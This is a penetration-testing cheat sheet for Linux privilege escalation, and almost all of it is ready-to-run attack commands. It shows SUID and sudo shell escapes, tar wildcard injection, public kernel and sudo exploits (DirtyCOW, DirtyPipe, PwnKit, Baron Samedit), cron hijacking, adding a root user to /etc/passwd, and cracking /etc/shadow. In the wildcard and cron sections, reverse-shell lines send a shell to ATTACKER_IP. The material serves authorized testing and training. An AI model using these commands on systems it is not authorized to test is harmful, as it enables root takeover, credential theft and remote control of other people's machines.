Linux Privilege Escalation

Linux privilege escalation exploits misconfigurations, SUID binaries, sudo permissions, cron jobs, and kernel vulnerabilities to gain root access from a standard user account.

Warning

Always ensure you have proper authorization. Kernel exploits can crash systems - use with caution and document all attempts.

Initial Enumeration

System Information

bash 
# Current user and groups
id
whoami
groups

# System information
uname -a
cat /etc/os-release
cat /etc/issue
hostname

# Environment variables
env
echo $PATH

Network Information

bash 
# Network configuration
ip a
ifconfig
cat /etc/hosts
cat /etc/resolv.conf

# Connections and listeners
netstat -tulpn
ss -tulpn

# Routing
route -n
ip route

Automated Enumeration Tools

LinPEAS

bash 
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Or transfer and execute
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Run specific checks
./linpeas.sh -s  # Superfast (no network/docker checks)
./linpeas.sh -P  # Password checks

LinEnum

bash 
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh -t

Linux Exploit Suggester

bash 
# LES - Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

# LES2 - More exploits
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl

pspy - Process Monitor

bash 
# Monitor processes without root (catches cron jobs)
wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64

SUID/SGID Exploitation

Find SUID/SGID Binaries

bash 
# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Find SGID binaries
find / -perm -g=s -type f 2>/dev/null

# Find both
find / -perm -4000 -o -perm -2000 -type f 2>/dev/null

GTFOBins Exploitation

Information

Check GTFOBins for SUID exploitation techniques for specific binaries.
bash 
# Common exploitable SUID binaries

# bash (SUID)
/bin/bash -p

# find
find . -exec /bin/sh -p \; -quit

# vim
vim -c ':!/bin/sh'

# nmap (older versions)
nmap --interactive
!sh

# python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# perl
perl -e 'exec "/bin/sh";'

# cp (copy /etc/passwd, modify, copy back)
cp /etc/passwd /tmp/passwd
# Add root user: echo 'hacker:$(openssl passwd password):0:0::/root:/bin/bash' >> /tmp/passwd
cp /tmp/passwd /etc/passwd

Sudo Exploitation

Check Sudo Permissions

bash 
# List sudo permissions
sudo -l

# Check sudo version (for CVE exploits)
sudo --version

GTFOBins Sudo Exploitation

bash 
# If sudo -l shows NOPASSWD for specific commands:

# vim
sudo vim -c ':!/bin/bash'

# find
sudo find /etc -exec /bin/bash \;

# awk
sudo awk 'BEGIN {system("/bin/bash")}'

# less/more
sudo less /etc/passwd
!/bin/bash

# man
sudo man man
!/bin/bash

# env
sudo env /bin/bash

# ftp
sudo ftp
!/bin/bash

# nmap
sudo nmap --interactive
!sh

Sudo Wildcards Exploitation

bash 
# If sudo allows: /bin/tar * 
# Create files named as flags
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" > shell.sh
sudo /bin/tar cf archive.tar *

# If sudo allows: /bin/rsync *
echo "" > "-e sh shell.sh"
sudo /bin/rsync -e sh shell.sh localhost:/tmp

CVE-2021-3156 (Baron Samedit)

bash 
# Check if vulnerable (sudo < 1.9.5p2)
sudoedit -s '\' $(python3 -c 'print("A"*1000)')

# Exploit
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich

Capabilities

Find Binaries with Capabilities

bash 
getcap -r / 2>/dev/null

Exploit Capabilities

bash 
# cap_setuid+ep (e.g., python)
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_dac_read_search (read any file)
# e.g., tar with cap_dac_read_search
tar -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar

# cap_net_bind_service (bind to privileged ports < 1024)
# Useful for phishing attacks or MitM

Cron Jobs

Enumerate Cron Jobs

bash 
# System crontabs
cat /etc/crontab
cat /etc/cron.d/*
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.monthly/

# User crontabs
crontab -l
cat /var/spool/cron/crontabs/*

# Use pspy to monitor
./pspy64

Cron Exploitation

bash 
# If cron runs writable script as root
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /path/to/script.sh

# If cron runs script from writable directory
echo '#!/bin/bash' > /writable/path/script.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /writable/path/script.sh
# Wait for cron, then: /tmp/bash -p

# PATH hijacking (if cron doesn't use absolute paths)
echo '#!/bin/bash' > /tmp/command_name
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /tmp/command_name
chmod +x /tmp/command_name
export PATH=/tmp:$PATH

Writable Files & Directories

/etc/passwd

bash 
# Check if writable
ls -la /etc/passwd

# If writable, add root user
# Generate password hash
openssl passwd -1 -salt hacker password

# Add user with root privileges (UID 0)
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash' >> /etc/passwd

# Login as new root user
su hacker

/etc/shadow

bash 
# If readable, crack hashes
cat /etc/shadow
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
hashcat -m 1800 -a 0 shadow.txt rockyou.txt

# If writable, replace root hash
# Generate: openssl passwd -6 password
vim /etc/shadow

SSH Keys

bash 
# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat /home/*/.ssh/id_rsa

# If authorized_keys is writable
# On attacker: ssh-keygen -t rsa
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
ssh -i id_rsa root@target

Kernel Exploits

Danger

Kernel exploits can crash systems. Always have backup access and test in lab first. Use as last resort.
bash 
# Check kernel version
uname -a
uname -r

# Use linux-exploit-suggester
./linux-exploit-suggester.sh

DirtyPipe (CVE-2022-0847)

bash 
# Linux kernel 5.8 - 5.16.11
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh
./exploit-1  # Overwrites /etc/passwd

DirtyCOW (CVE-2016-5195)

bash 
# Linux kernel 2.6.22 - 4.8.3
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password
# Creates firefart user with root privileges

PwnKit (CVE-2021-4034)

bash 
# Polkit pkexec - affects most Linux distros
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make
./cve-2021-4034

Credential Hunting

bash 
# Search for passwords
grep -r "password" /etc/ 2>/dev/null
grep -r "password" /home/ 2>/dev/null
grep -r "pass" /var/www/ 2>/dev/null

# History files
cat ~/.bash_history
cat ~/.zsh_history

# Config files
cat /etc/mysql/my.cnf
cat /var/www/html/config.php
cat /var/www/html/.env

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null

# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null

🛠️ Tools Reference

LinPEAS

Comprehensive Linux privesc scanner

GitHub →

GTFOBins

SUID/sudo binary exploitation

Website →

pspy

Process monitor without root

GitHub →

LES

Linux Exploit Suggester

GitHub →

Related Topics

Windows Privilege Escalation

Windows local privesc techniques

Persistence

Maintaining access

Data Exfiltration

Extracting data from targets